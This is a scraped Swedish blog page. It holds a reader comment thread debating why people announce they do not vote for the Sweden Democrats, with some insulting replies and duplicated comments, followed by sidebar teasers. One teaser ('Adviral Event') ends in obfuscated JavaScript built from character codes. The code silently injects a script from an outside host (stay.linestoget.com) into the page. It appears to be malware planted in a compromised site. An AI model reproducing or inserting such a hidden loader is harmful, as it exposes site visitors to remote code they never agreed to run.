    • Fast Lena, nu handlade ju inte tråden om huruvida hemska, rasistiska SD är. Det handlar om varför folk har sådana behov av att tala om att just hen minsann inte röstar på SD. Någon skrev att de är precis som om att få en ”klapp på axeln” som talar om att ok cdu är ingen hemsk människa för du röstar ju inte på SD.

      Det är det jag tycker är så konstigt. Varför blanda in det? Gör vad du ska, gå o rösta och vill du berätta vad du röstat på så gör det. Annars kan du du ju dra upp att jag röstade inte på kd, S, M, Liberalerna, V, mp, C, liksom. Varför säga just SD? Det är det som är iaf min poäng.

      Vill oxå säga att detta är inget påhopp mot just my. Här finns några fula kommentarer som handlar om själva my o det tar jag avstånd ifrån. Man måste väl få reflektera saker på ett vettigt sätt. Jag följer bloggen o tänker att jag ville lyfta ämnet då jag en längre tid sett på olika sociala medier just detta o jag tycker det är lite skevt helt enkelt.

      Peace❤️

      • Så bra och klokt skrivet Charlotte helt enig, har inte sett någon skriva att något av de andra partierna inte fick deras röst handlar bara om SD hela tiden.

        • Flärd… Slut på medicinen? Ingen som lyssnar på dig i riktiga livet?
          Måste in på en blogg och kräkas?
          Du, vet du vad? Spring en mil.
          Krama ett träd.
          Eller helt enkelt, håll din skit för dig själv.

        • Men på riktigt, förstår ni inte det?
          Det är ett extremt parti som har en människosyn som dom flesta inte vill ha att göra med. Dessutom visar det sig att många som röstar på SD inte direkt har så mycket studieskulder…
          ”SD tycker vi har för mycket invandrare, dom röstar vi på” typ.
          Därför kära ni tycker många att dom vill tala om att dom inte röstar på SD. Fatta?

    • Jo det har vi… sen har vi läst lite annan historia också! Inte bara korvstoppning från ett håll! Ingen tror väl på allvar att någon vill ha tillbaks stöveltrampet från 30-talet? Det är lite andra ” utmaningar” vi har att tampas med nu och i framtiden.

    • fia! Tydligen har inte du det heller då. Vad har vänstern stått för i alla år? Värre finns inte. Sen hur i helvete kan du jämföra våra kvinnliga invandrare som röstar på SD och vanligt folk för nazister. Har du ens läst en bok överhuvudtaget?

    • Jo det har vi… sen har vi läst lite annan historia också! Inte bara korvstoppning från ett håll! Ingen tror väl på allvar att någon vill ha tillbaks stöveltrampet från 30-talet? Det är lite andra ” utmaningar” vi har att tampas med nu och i framtiden.

    • fia! Tydligen har inte du det heller då. Vad har vänstern stått för i alla år? Värre finns inte. Sen hur i helvete kan du jämföra våra kvinnliga invandrare som röstar på SD och vanligt folk för nazister. Har du ens läst en bok överhuvudtaget?

  19. Låt var och en rösta på vad den vill ta ett eget beslut, det är därför vi har den möjligheten och landet vi bor i är en demokrati.

  20. Låt var och en rösta på vad den vill ta ett eget beslut, det är därför vi har den möjligheten och landet vi bor i är en demokrati.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/